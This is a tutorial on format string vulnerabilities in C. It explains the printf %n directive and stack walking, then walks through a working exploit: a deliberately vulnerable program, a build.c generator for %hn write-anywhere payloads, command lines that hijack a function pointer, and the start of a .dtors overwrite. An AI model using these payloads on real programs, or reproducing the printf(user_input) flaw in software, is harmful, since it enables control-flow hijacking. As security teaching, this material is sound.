Avoiding security holes when developing an application - Part 4: format strings

ArticleCategory:

Software Development

AuthorImage:

[image of the authors]

TranslationInfo:

Original in fr

fr to en:

en to en:

AboutTheAuthor:

Christophe Blaess is an independent aeronautics engineer. He is a Linux fan and does much of his work on this system. He coordinates the translation of the man pages as published by the Linux Documentation Project.

Christophe Grenier is a 5th year student at the ESIEA, where he works as a sysadmin too. He has a passion for computer security.

Frédéric Raynal has been using Linux for many years because it doesn't pollute, it doesn't use hormones, MSG or animal by-products... only sweat and craft.

Abstract

For some time now, messages announcing format string exploits have become more and more numerous. This article explains where the danger comes from and shows that an attempt to save six bytes is enough to compromise the security of a program.

ArticleIllustration:[illustration]

[article illustration]

ArticleBody:[The real article: put the text and html-codes here]

Where is the danger?

Most security flaws come from bad configuration or laziness. This rule holds true for format strings.

It is often necessary to use null-terminated strings in a program. Where in the program they are used is not important here. This vulnerability is, once again, about writing directly to memory. The data for the attack can come from stdin, files, etc. A single instruction is enough to display such a string:

printf("%s", str);

However, a programmer may decide to save time and six bytes by writing only:

printf(str);

With "economy" in mind, this programmer opens a potential hole in his work. He is content to pass a single string as an argument, which he simply wanted to display without any change. However, this string is parsed for formatting directives (%d, %g...). When such a directive is found, the corresponding argument is looked for on the stack.
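The difference between the two calls can be shown without touching the stack at all. The sketch below is only an illustration: the helper name copy_verbatim() is hypothetical and does not come from the programs discussed in this article. It passes the untrusted text as an argument of the constant format "%s", so any % character it contains is copied literally instead of being interpreted.

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper (an assumption made for illustration): copy
 * untrusted text into dst without ever using it as a format string.
 * Returns the value of snprintf(), i.e. the length of the text. */
int copy_verbatim(char *dst, size_t size, const char *untrusted)
{
    /* The format is the constant "%s"; untrusted is only data. */
    return snprintf(dst, size, "%s", untrusted);
}
```

Called with the text "%x %x %n", this helper leaves exactly those eight characters in dst, and no argument is fetched from the stack.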

We will start by introducing the family of printf() functions. We expect everyone knows them ... but not in detail, so we will deal with the lesser known aspects of these routines. Then, we will see how to get the information needed to exploit such a mistake. Finally, we will show how all this fits together with a single example.

Deep inside format strings

In this part, we will consider the format strings. We will start with a summary about their use and we will discover a rather little known format instruction that will reveal all its mystery.

printf(): they told me a lie!

Note for non-French residents: we have in our nice country a racing cyclist who claimed for months not to have taken drugs while all the other members of his team admitted it. He claims that if he was doped, he didn't know it. So, a famous puppet show used the French sentence "on m'aurait menti !" which gave me the idea for this title.

Let us start with what we all learned in our programming handbooks: most C input/output functions use data formatting, which means that one has to provide not only the data to read or write, but also how it should be displayed. The following program illustrates this:

/* display.c */
#include <stdio.h>

int main(void) {
  int i = 64;
  char a = 'a';
  printf("int  : %d %d\n", i, a);
  printf("char : %c %c\n", i, a);
  return 0;
}
Running it displays:
>>gcc display.c -o display
>>./display
int  : 64 97
char : @ a
The first printf() writes the value of the integer variable i and of the character variable a as int (this is done using %d), which causes a to be displayed as its ASCII value, 97. On the other hand, the second printf() converts the integer variable i to the character whose ASCII code is 64, that is '@'.

Nothing new - everything conforms to the many functions with a prototype similar to the printf() function :

  1. one argument, in the form of a character string (const char *format) is used to specify the selected format;
  2. one or more other optional arguments, containing the variables in which values are formatted according to the indications given in the previous string.

Most of our programming lessons stop there, providing a non-exhaustive list of possible formats (%g, %h, %x, the use of the dot character . to force the precision...). But there is another one that is never talked about: %n. Here is what the printf() man page says about it:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Here is the most important point of this article: this format makes it possible to write to the variable a pointer refers to, even when used in a display function!

Before continuing, let us say that this format also exists for functions from the scanf() and syslog() family.

Time to play

We are going to study the use and the behavior of this format through small programs. The first, printf1, shows a very simple use:

/* printf1.c */
1: #include <stdio.h>
2: 
3: main() {
4:   char *buf = "0123456789";
5:   int n;
6:   
7:   printf("%s%n\n", buf, &n);
8:   printf("n = %d\n", n);
9: }

The first printf() call displays the string "0123456789" which contains 10 characters. The next %n format writes this value to the variable n:

>>gcc printf1.c -o printf1
>>./printf1 
0123456789
n = 10
Let's slightly transform our program by replacing the printf() instruction on line 7 with the following one:
7:   printf("buf=%s%n\n", buf, &n);

Running this new program confirms our idea: the variable n is now 14, (10 characters from the buf string variable added to the 4 characters from the "buf=" constant string, contained in the format string itself).
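The same count can be obtained from a small function. This is only a sketch: the helper count_with_n() is hypothetical, and it uses snprintf() with a scratch buffer instead of printing to the terminal. Note also that some hardened C libraries restrict or disable %n, so this is not guaranteed to work everywhere.

```c
#include <stdio.h>

/* Hypothetical helper: returns what %n records after prefix and text
 * have been formatted into a scratch buffer. */
int count_with_n(const char *prefix, const char *text)
{
    char scratch[64];
    int n = -1;   /* stays -1 only if %n is never processed */

    snprintf(scratch, sizeof scratch, "%s%s%n", prefix, text, &n);
    return n;
}
```

With the prefix "buf=" and the text "0123456789" the function returns 14; with an empty prefix it returns 10, as in the two runs above.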

So, we know the %n format counts every character written, including those coming from the format string itself. Moreover, as the printf2 program demonstrates, it counts even further:

/* printf2.c */

#include <stdio.h>
#include <string.h>   /* strlen() */

int main(void) {
  char buf[10];
  int n, x = 0;
  
  snprintf(buf, sizeof buf, "%.100d%n", x, &n);
  printf("l = %d\n", (int) strlen(buf));
  printf("n = %d\n", n);
  return 0;
}
The snprintf() function is used here to prevent buffer overflows. We would therefore expect the variable n to be no more than 10:
>>gcc printf2.c -o printf2
>>./printf2
l = 9
n = 100
Strange? In fact, the %n format counts the number of characters that should have been written. This example shows that the truncation due to the size specification is ignored.
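This count can be compared with the return value of snprintf(), which C99 defines as the number of characters that would have been written had the buffer been large enough. The following sketch assumes a C99-conforming snprintf(); the helper padded_count() is hypothetical, and it uses the standard * notation to pass the precision as an argument.

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: format x with the given precision into dst
 * (at most size bytes, terminator included) and report the count
 * stored by %n through counted. Returns snprintf()'s own result. */
int padded_count(char *dst, size_t size, int precision, int x, int *counted)
{
    return snprintf(dst, size, "%.*d%n", precision, x, counted);
}
```

With a 10-byte buffer, a precision of 100 and x = 0, the buffer ends up holding 9 characters while both the return value and the value stored by %n are 100.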

What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:

/* printf3.c */

#include <stdio.h>
#include <string.h>   /* strlen() */

int main(void) {
  char buf[5];
  int n, x = 1234;

  snprintf(buf, sizeof buf, "%.5d%n", x, &n);
  printf("l = %d\n", (int) strlen(buf));
  printf("n = %d\n", n);
  printf("buf = [%s] (%d)\n", buf, (int) sizeof buf);
  return 0;
}
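printf3 differs slightly from printf2: the buffer is reduced to 5 bytes, the precision is set to 5, x is no longer zero, and the content of the buffer is displayed. We get the following output: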
>>gcc printf3.c -o printf3
>>./printf3
l = 4
n = 5
buf = [0123] (5)
The first two lines are not surprising. The last one illustrates the behavior of the printf() function:
  1. the format string is expanded according to the directives it contains, which gives the string "00000\0";
  2. the variables are written where and how they should be, which is illustrated by the copying of x in our example. The string then looks like "01234\0";
  3. finally, sizeof buf - 1 bytes of this string are copied into the destination buffer buf, which gives "0123\0".
This is not perfectly exact but reflects the general process. For more details, refer to the glibc sources, in particular vfprintf() in the ${GLIBC_HOME}/stdio-common directory.

Before ending this part, let's add that the same results can be obtained by writing the format string in a slightly different way. We previously used the format called precision (the dot '.'). Another combination of formatting instructions leads to an identical result: 0n, where n is the field width and 0 means that padding spaces are replaced with zeros when the value does not fill the whole width.
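The equivalence of the two notations can be checked with a few lines of C. This is a minimal sketch, and the helper same_padding() is hypothetical; it formats the same value once with a precision and once with a zero-padded width, then compares the results.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: returns 1 when the precision form ("%.Nd") and
 * the zero-padded width form ("%0Nd") give the same text for value.
 * width is expected to stay well below the 64-byte scratch buffers. */
int same_padding(int width, int value)
{
    char by_precision[64];
    char by_width[64];

    snprintf(by_precision, sizeof by_precision, "%.*d", width, value);
    snprintf(by_width, sizeof by_width, "%0*d", width, value);
    return strcmp(by_precision, by_width) == 0;
}
```

For 1234 and a width of 5, both forms give "01234". The two notations only coincide for non-negative values: for a negative number the precision counts digits only, while the width also counts the minus sign.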

Now that you know almost everything about format strings, and most specifically about the %n format, we will study their behaviors.

The stack and printf()

Walking through the stack

The next program will guide us all along this section to understand how printf() and the stack are related:

/* stack.c */
 1: #include <stdio.h>
 2: 
 3: int
 4: main(int argc, char **argv)
 5: {
 6:   int i = 1;
 7:   char buffer[64];
 8:   char tmp[] = "\x01\x02\x03";
 9:
10:   snprintf(buffer, sizeof buffer, argv[1]);
11:   buffer[sizeof (buffer) - 1] = 0;
12:   printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
13:   printf ("i = %d (%p)\n", i, &i);
14: }
This program just copies an argument into the buffer character array. We take care not to overflow any important data (format strings are really more accurate than buffer overflows ;-)
>>gcc stack.c -o stack
>>./stack toto
buffer : [toto] (4)
i = 1 (bffff674)
It works as we expected :) Before going further, let's examine what happens from the stack point of view while calling snprintf() at line 10.
[Fig. 1: the stack at the beginning of snprintf()]

Figure 1 describes the state of the stack when the program enters the snprintf() function (we'll see that this is not quite true ... but it is just to give you an idea of what's happening). We don't care about the %esp register. It is somewhere below the %ebp register. As we have seen in a previous article, the first two values located at %ebp and %ebp+4 contain the respective backups of the %ebp and %eip registers. Next come the arguments of the function snprintf():

  1. the destination address;
  2. the number of characters to be copied;
  3. the address of the format string argv[1] which also acts as data.
Lastly, the stack is topped off with the 4-character tmp array, the 64 bytes of the buffer variable and the integer variable i.

The argv[1] string is used at the same time as format string and data. According to the normal order of the snprintf() routine, argv[1] appears instead of the format string. Since you can use a format string without format directives (just text), everything is fine :)

What happens when argv[1] also contains formatting directives? Normally, snprintf() interprets them as they are ... and there is no reason why it should act differently! But here, you may wonder which arguments are going to be used as data for formatting the resulting output string. In fact, snprintf() grabs data from the stack! You can see that with our stack program:

>>./stack "123 %x"
buffer : [123 30201] (9)
i = 1 (bffff674)

First, the "123 " string is copied into buffer. The %x asks snprintf() to translate the first value into hexadecimal. From figure 1, this first argument is nothing but the tmp variable which contains the \x01\x02\x03\x00 string. It is displayed as the 0x00030201 hexadecimal number according to our little endian x86 processor.

>>./stack "123 %x %x"
buffer : [123 30201 20333231] (18)
i = 1 (bffff674)

Adding a second %x enables you to go higher in the stack. It tells snprintf() to look for the next 4 bytes after the tmp variable. These 4 bytes are in fact the first 4 bytes of buffer. However, buffer contains the "123 " string, which can be seen as the hexadecimal number 0x20333231 (0x20=space, 0x31='1'...). So, for each %x, snprintf() "jumps" 4 bytes further in buffer (4 because an unsigned int takes 4 bytes on x86 processors). This variable acts as a double agent by:

  1. being written to as the destination;
  2. being read as input data for the format.
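The two hexadecimal values seen so far follow directly from the little endian byte order. As a sketch (the helper le_word() is hypothetical), the value that %x displays for four consecutive bytes on x86 can be recomputed by hand:

```c
#include <stdint.h>

/* Hypothetical helper: the value "%x" shows for four bytes read from
 * memory on a little endian machine such as x86 (the lowest address
 * holds the least significant byte). */
uint32_t le_word(const unsigned char bytes[4])
{
    return (uint32_t)bytes[0]
         | ((uint32_t)bytes[1] << 8)
         | ((uint32_t)bytes[2] << 16)
         | ((uint32_t)bytes[3] << 24);
}
```

Applied to the bytes of tmp (\x01 \x02 \x03 \x00) it gives 0x00030201, and applied to the four characters "123 " it gives 0x20333231, the two numbers found in the output of stack.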
We can "climb up" the stack as long as our buffer contains bytes:
>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x"
buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378 
         0x333837] (63)
i = 1 (bffff654)

Even higher

The previous method allows us to look for important information such as the return address of the function that created the stack frame holding the buffer. However, it is possible, with the right format, to look for data further than the vulnerable buffer.

There is an occasionally useful format for when the parameters need to be used in a different order (for instance, while displaying date and time). We add the m$ notation right after the %, where m is an integer >0. It gives the position of the variable to use in the argument list (starting from 1):

/* explore.c */
#include <stdio.h>
#include <string.h>   /* memset(), strlen() */

int
main(int argc, char **argv) {

  char buf[12];

  memset(buf, 0, 12);
  snprintf(buf, 12, argv[1]);

  printf("[%s] (%d)\n", buf, (int) strlen(buf));
  return 0;
}

The format using m$ enables us to go up where we want in the stack, as we could do using gdb:

>>./explore %1\$x
[0] (1)
>>./explore %2\$x
[0] (1)
>>./explore %3\$x
[0] (1)
>>./explore %4\$x
[bffff698] (8)
>>./explore %5\$x
[1429cb] (6)
>>./explore %6\$x
[2] (1)
>>./explore %7\$x
[bffff6c4] (8)

The \ character is necessary here to protect the $ and prevent the shell from interpreting it. In the first three calls we visit the contents of the buf variable. With %4\$x, we get the saved %ebp register, and then with %5\$x, the saved %eip register (a.k.a. the return address). The last 2 results presented here show the value of the argc variable and the address contained in argv (remember that char **argv means that argv points to an array of addresses).
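Outside of any attack, the m$ notation is meant for reordering arguments. As a small sketch (the helper time_then_date() is hypothetical, and m$ is a POSIX extension rather than ISO C), the same two arguments can be displayed in swapped order:

```c
#include <stdio.h>
#include <stddef.h>

/* Hypothetical helper: the arguments are passed as (date, time), but
 * the format asks for argument 2 first and argument 1 second. */
int time_then_date(char *dst, size_t size,
                   const char *date, const char *time_of_day)
{
    return snprintf(dst, size, "%2$s %1$s", date, time_of_day);
}
```

Called with "2001-04-01" and "12:30", it stores "12:30 2001-04-01" in dst. The explore program relies on exactly the same mechanism, except that the format asks for arguments that were never passed.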

In short ...

This example illustrates that the provided formats enable us to go up within the stack in search of information, such as the return address of a function or the address of a variable. However, we saw at the beginning of this article that we could write using functions of the printf() type: doesn't this look like a wonderful potential vulnerability?

First steps

Let's go back to the stack program:

>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
buffer : [döÿ¿000000000000000000000000000000000000000000000000
00000000000] (63)
i = 500 (bffff664)
        
We give as input string:
  1. the i variable address;
  2. a formatting instruction (%.496x);
  3. a second formatting instruction (%n) which will write into the given address.
To determine the address of the i variable (0xbffff664 here), we can run the program twice and change the command line accordingly. As you can see, i has a new value :) The given format string and the stack organization make the snprintf() call look like:
snprintf(buffer,
         sizeof buffer,
         "\x64\xf6\xff\xbf%.496x%n",
         tmp,
         4 first bytes in buffer);

The first four bytes (containing the address of i) are written at the beginning of buffer. The %.496x format lets us get rid of the tmp variable, which is at the beginning of the stack. Then, when the %n instruction is reached, the address used is that of i, found at the beginning of buffer. Although the required precision is 496, snprintf() writes at most sixty bytes (because the length of the buffer is 64 and 4 bytes have already been written). The value 496 is arbitrary, and is just used to manipulate the "byte counter". We have seen that the %n format saves the number of bytes that should have been written. This value is 496, to which we have to add the 4 bytes of the address of i at the beginning of buffer. Therefore, we have counted 500 bytes. This value is written to the next address found in the stack, which is the address of i.
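The arithmetic of the "byte counter" (4 + 496 = 500) can be reproduced in a harmless way, with the address passed as a regular argument. This is only a sketch: the helper set_via_n() is hypothetical, and it calls snprintf() with a NULL destination of size 0 to stress that the count does not depend on what is really stored.

```c
#include <stdio.h>

/* Hypothetical helper: stores value (which must be >= 4) into *target
 * using nothing but the character counter of a printf-like function. */
void set_via_n(int *target, int value)
{
    /* 4 literal characters + (value - 4) padded digits = value.
     * With a NULL destination of size 0 nothing is stored at all,
     * yet %n still records the full count. */
    snprintf(NULL, 0, "AAAA%.*x%n", value - 4, 0u, target);
}
```

Calling set_via_n(&i, 500) leaves 500 in i, exactly as the command line above does for the i variable of stack. The only difference is where the address comes from: here it is a genuine argument, there it is read from the buffer.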

We can go even further with this example. To change i, we needed to know its address ... but sometimes the program itself provides it:

/* swap.c */
#include <stdio.h>

int main(int argc, char **argv) {

  int cpt1 = 0;
  int cpt2 = 0;
  int *addr_cpt1 = &cpt1;   /* pointers left on the stack on purpose */
  int *addr_cpt2 = &cpt2;

  printf(argv[1]);
  printf("\ncpt1 = %d\n", cpt1);
  printf("cpt2 = %d\n", cpt2);
  return 0;
}

Running this program shows that we can control the stack (almost) as we want:

>>./swap AAAA
AAAA
cpt1 = 0
cpt2 = 0
>>./swap AAAA%1\$n
AAAA
cpt1 = 0
cpt2 = 4
>>./swap AAAA%2\$n
AAAA
cpt1 = 4
cpt2 = 0

As you can see, depending on the argument, we can change either cpt1 or cpt2. The %n format expects an address, which is why we can't act directly on the variables (i.e. using %3$n (cpt2) or %4$n (cpt1)) but have to go through pointers. The latter are "fresh meat" with enormous possibilities for modification.

Variations on the same topic

The examples presented so far come from a program compiled with egcs-2.91.66 and glibc-2.1.3-22. However, you probably won't get the same results on your own box. Indeed, the *printf() functions change from one glibc version to another, and different compilers do not carry out the same operations at all.

The program stuff highlights these differences:

/* stuff.c */
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* memset(), strlen() */

int main(int argc, char **argv) {
  
  char aaa[] = "AAA";
  char buffer[64];
  char bbb[] = "BBB";

  if (argc < 2) {
    printf("Usage : %s <format>\n",argv[0]);
    exit (-1);
  }

  memset(buffer, 0, sizeof buffer);
  snprintf(buffer, sizeof buffer, argv[1]);
  printf("buffer = [%s] (%d)\n", buffer, (int) strlen(buffer));
  return 0;
}

The aaa and bbb arrays are used as delimiters in our journey through the stack. Therefore we know that when we find 424242, the following bytes will be in buffer. Table 1 presents the differences according to the versions of the glibc and compilers.

Tab. 1: Variations around glibc

Compiler      glibc      Display
gcc-2.95.3    2.1.3-16   buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63)
egcs-2.91.66  2.1.3-22   buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63)
gcc-2.96      2.1.92-14  buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)
gcc-2.96      2.2-12     buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63)

In the rest of this article, we will continue to use egcs-2.91.66 and glibc-2.1.3-22, but don't be surprised if you notice differences on your machine.

Exploitation of a format bug

While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.

With format strings, we have seen that we can go anywhere (stack, heap, bss, .dtors, ...): we just have to say where and what to write, and %n does the job for us.

The vulnerable program

A format bug can be exploited in different ways. P. Bouchareine's article (Format string vulnerability) shows how to overwrite the return address of a function, so we'll show something else.
/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
  char buffer[128];
  int (*ptrf)();

  memset(buffer, 0, sizeof(buffer));

  printf("helloWorld() = %p\n", helloWorld);
  printf("accessForbidden() = %p\n\n", accessForbidden);

  ptrf = helloWorld;
  printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);
  
  snprintf(buffer, sizeof buffer, format);
  printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

  printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

  return ptrf();
}

int main(int argc, char **argv) {
  int i;
  if (argc <= 1) {
    fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
    exit(-1);
  }
  for(i=0;i<argc;i++)
    printf("%d %p\n",i,argv[i]);
  
  exit(vuln(argv[1]));
}

int helloWorld()
{
  printf("Welcome in \"helloWorld\"\n");
  fflush(stdout);
  return 0;
}

int accessForbidden()
{
  printf("You shouldn't be here \"accesForbidden\"\n");
  fflush(stdout);
  return 0;
}

We define a variable named ptrf which is a pointer to a function. We will change the value of this pointer to run the function we choose.

First example

First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:

>>./vuln "AAAA %x %x %x %x"
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37)
after : ptrf() = 0x8048634 (0xbffff5d4)
Welcome in "helloWorld"

>>./vuln AAAA%3\$x
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5e4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048634 (0xbffff5e4)
Welcome in "helloWorld"

The first call here gives us what we need: 3 words (one word = 4 bytes for x86 processors) separate us from the beginning of the buffer variable. The second call, with AAAA%3\$x as argument, confirms this.

Our goal is now to replace the value of the initial pointer ptrf (0x8048634, the address of the function helloWorld()) with the value 0x8048654 (address of accessForbidden()). We have to write 0x8048654 bytes (134514260 bytes in decimal, something like 128 Mbytes). Not every computer can afford such a use of memory ... but the one we are using can :) It takes around 20 seconds on a dual Pentium 350 MHz:

>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n `
helloWorld() = 0x8048634
accessForbidden() = 0x8048654

before : ptrf() = 0x8048634 (0xbffff5d4)
buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000
0000000000000] (127)
after : ptrf() = 0x8048654 (0xbffff5d4)
You shouldn't be here "accesForbidden"

What did we do? We just provided the address of ptrf (0xbffff5d4). The next format (%.134514256x) reads the first word from the stack, with a precision of 134514256 (we have already written the 4 bytes of the address of ptrf, so we still have to write 134514260-4=134514256 bytes). Finally, we write the wanted value to the given address (%3$n).

Memory problems: divide and conquer

However, as we mentioned, it isn't always possible to use 128MB buffers. The %n format expects a pointer to an integer, i.e. four bytes. It is possible to alter its behavior to make it point to a short int - only 2 bytes - thanks to the %hn instruction. We thus cut the integer we want to write into two parts. The largest value to write then fits in 0xffff bytes (65535 bytes). Thus, in the previous example, we transform the operation "writing 0x8048654 at the 0xbffff5d4 address" into two successive operations:

  1. writing 0x8654 at the 0xbffff5d4 address;
  2. writing 0x0804 at the 0xbffff5d4+2=0xbffff5d6 address.

The second write operation takes place on the high bytes of the integer, which explains the shift of 2 bytes.

However, %n (or %hn) counts the total number of characters written into the string. This number can only increase. So we first have to write the smaller of the two values. Then, the second format only uses, as its precision, the difference between the needed number and the number already written. For instance in our example, the first format operation will be %.2052x (2052 = 0x0804) and the second %.32336x (32336 = 0x8654 - 0x0804). Each %hn placed right after will record the right number of bytes.
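The ordering rule can be written down as a few lines of arithmetic. This is a sketch only: the structure hn_plan and the function plan_halves() are hypothetical names, and the bytes already written at the start of the string are deliberately left out of the computation.

```c
#include <stdint.h>

/* Hypothetical structure describing the two %hn writes. */
struct hn_plan {
    unsigned first;      /* count needed before the first %hn       */
    unsigned increment;  /* extra characters before the second %hn  */
    int high_first;      /* 1 if the high half is written first     */
};

/* Split a 32-bit value into two 16-bit halves and order them so that
 * the character counter only ever has to increase. */
struct hn_plan plan_halves(uint32_t value)
{
    unsigned high = (value >> 16) & 0xffffu;
    unsigned low = value & 0xffffu;
    struct hn_plan plan;

    plan.high_first = high < low;
    plan.first = plan.high_first ? high : low;
    plan.increment = plan.high_first ? low - high : high - low;
    return plan;
}
```

For the value 0x8048654, the plan is to write the high half first with a count of 2052, then add 32336 characters before the second %hn, which matches the two precisions given above.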

We just have to specify where to write to both %hn. The m$ operator will greatly help us. If we save the addresses at the beginning of the vulnerable buffer, we just have to go up through the stack to find the offset from the beginning of the buffer using the m$ format. Then, both addresses will be at an offset of m and m+1. As we use the first 8 bytes in the buffer to save the addresses to overwrite, the first written value must be decreased by 8.

Our format string looks like:

"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max - val. min.]x%[offset+1]$hn"

The build program uses three arguments to create a format string:

  1. the address to overwrite;
  2. the value to write there;
  3. the offset (counted as words) from the beginning of the vulnerable buffer.
/* build.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
   The 4 bytes where we have to write are placed that way :
   HH HH LL LL
   The variables ending with "*h" refer to the high part
   of the word (H) The variables ending with "*l" refer
   to the low part of the word (L)
 */
char* build(unsigned int addr, unsigned int value, 
      unsigned int where) {

  /* too lazy to evaluate the true length ... :*/
  unsigned int length = 128; 
  unsigned int valh;
  unsigned int vall;
  unsigned char b0 = (addr >> 24) & 0xff;
  unsigned char b1 = (addr >> 16) & 0xff;
  unsigned char b2 = (addr >>  8) & 0xff;
  unsigned char b3 = (addr      ) & 0xff;

  char *buf;

  /* detailing the value */
  valh = (value >> 16) & 0xffff; //top
  vall = value & 0xffff;         //bottom

  fprintf(stderr, "adr : %d (%x)\n", addr, addr);
  fprintf(stderr, "val : %d (%x)\n", value, value);
  fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
  fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

  /* buffer allocation */
  if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
    fprintf(stderr, "Can't allocate buffer (%d)\n", length);
    exit(EXIT_FAILURE);
  }
  memset(buf, 0, length);

  /* let's build
     (%u is used for the counts and offsets: they are unsigned
     and the counts may exceed 32767) */
  if (valh < vall) {

    snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%ux"             /* set the value for the first %hn */
         "%%%u$hn"            /* the %hn for the high part */

         "%%.%ux"             /* set the value for the second %hn */
         "%%%u$hn"            /* the %hn for the low part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         valh-8,              /* set the value for the first %hn */
         where,               /* the %hn for the high part */

         vall-valh,           /* set the value for the second %hn */
         where+1              /* the %hn for the low part */
         );

  } else {

     snprintf(buf,
         length,
         "%c%c%c%c"           /* high address */
         "%c%c%c%c"           /* low address */

         "%%.%ux"             /* set the value for the first %hn */
         "%%%u$hn"            /* the %hn for the low part */

         "%%.%ux"             /* set the value for the second %hn */
         "%%%u$hn"            /* the %hn for the high part */
         ,
         b3+2, b2, b1, b0,    /* high address */
         b3, b2, b1, b0,      /* low address */

         vall-8,              /* set the value for the first %hn */
         where+1,             /* the %hn for the low part */

         valh-vall,           /* set the value for the second %hn */
         where                /* the %hn for the high part */
         );
  }
  return buf;
}

int
main(int argc, char **argv) {

  char *buf;

  if (argc < 4)   /* three arguments are required */
    return EXIT_FAILURE;
  buf = build(strtoul(argv[1], NULL, 16),  /* address */
          strtoul(argv[2], NULL, 16),  /* value */
          atoi(argv[3]));              /* offset */
  
  fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
  printf("%s",  buf);
  return EXIT_SUCCESS;
}

The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let's check what we get now, without any memory troubles.

First, our simple example lets us guess the offset:

>>./vuln AAAA%3\$x
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5d4)
buffer = [AAAA41414141] (12)
after : ptrf() = 0x8048644 (0xbffff5d4)
Welcome in "helloWorld"

It is always the same: 3. Since our program is designed to explain what happens, we already have all the other information we need: the addresses of ptrf and accessForbidden(). We build our buffer according to these:

>>./vuln `./build 0xbffff5d4 0x8048664 3` 
adr : -1073744428 (bffff5d4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000
00000000] (127)
after : ptrf() = 0x8048644 (0xbffff5b4)
Welcome in "helloWorld"

Nothing happens! In fact, since the format string is longer than in the previous example, the stack moved (ptrf has gone from 0xbffff5d4 to 0xbffff5b4). Our values need to be adjusted:
>>./vuln `./build 0xbffff5b4 0x8048664 3`
adr : -1073744460 (bffff5b4)
val : 134514276 (8048664)
valh: 2052 (0804)
vall: 34404 (8664)
[¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33)
argv2 = 0xbffff819
helloWorld() = 0x8048644
accessForbidden() = 0x8048664

before : ptrf() = 0x8048644 (0xbffff5b4)
buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000] (127)
after : ptrf() = 0x8048664 (0xbffff5b4)
You shouldn't be here "accesForbidden"

We won!!!

Other exploits

In this article, we started by proving that format bugs are a real vulnerability. Another important concern is how to exploit them. Buffer overflow exploits rely on writing to the return address of a function. Then, you have to try (almost) at random and pray a lot for your scripts to find the right values (even the eggshell must be full of NOPs). You don't need all this with format bugs, and you are no longer restricted to overwriting the return address.

We have seen that format bugs allow us to write anywhere. So, we will see now an exploitation based on the .dtors section.

When a program is compiled with gcc, you can find a constructor section (named .ctors) and a destructor (named .dtors). Each of these sections contains pointers to functions to be carried out before entering the main() function and after exiting, respectively.

/* cdtors.c */
#include <stdio.h>

void start(void) __attribute__ ((constructor));
void end(void) __attribute__ ((destructor));

int main() {
  printf("in main()\n");
  return 0;
}

void start(void) {
  printf("in start()\n");
}

void end(void) {
  printf("in end()\n");
}
Our small program shows that mechanism:
>>gcc cdtors.c -o cdtors
>>./cdtors
in start()
in main()
in end()
Each one of these sections is built in the same way:
>>objdump -s -j .ctors cdtors

cdtors:     file format elf32-i386

Contents of section .ctors:
 804949c ffffffff dc830408 00000000           ............    
>>objdump -s -j .dtors cdtors

cdtors:     file format elf32-i386

Contents of section .dtors:
 80494a8 ffffffff f0830408 00000000           ............    
We check that the indicated addresses match those of our functions (note that the preceding objdump command shows the addresses in little endian):
>>objdump -t cdtors | egrep "start|end"
080483dc g     F .text  00000012              start
080483f0 g     F .text  00000012              end
So, these sections contain the addresses of the functions to run at the beginning (or the end), framed with 0xffffffff and 0x00000000.

Let us apply this to vuln by using the format string. First, we have to get the location of these sections in memory, which is really easy when you have the binary at hand ;-) Simply use objdump as we did previously:

>> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049844 ffffffff 00000000                    ........        
Here it is ! We have everything we need now.

The goal of the exploitation is to replace the address of a function in one of these sections with that of the function we want to execute. If those sections are empty, we just have to overwrite the 0x00000000 which marks the end of the section. This will cause a segmentation fault: since the program no longer finds this 0x00000000, it takes the next value as the address of a function, which it probably is not.

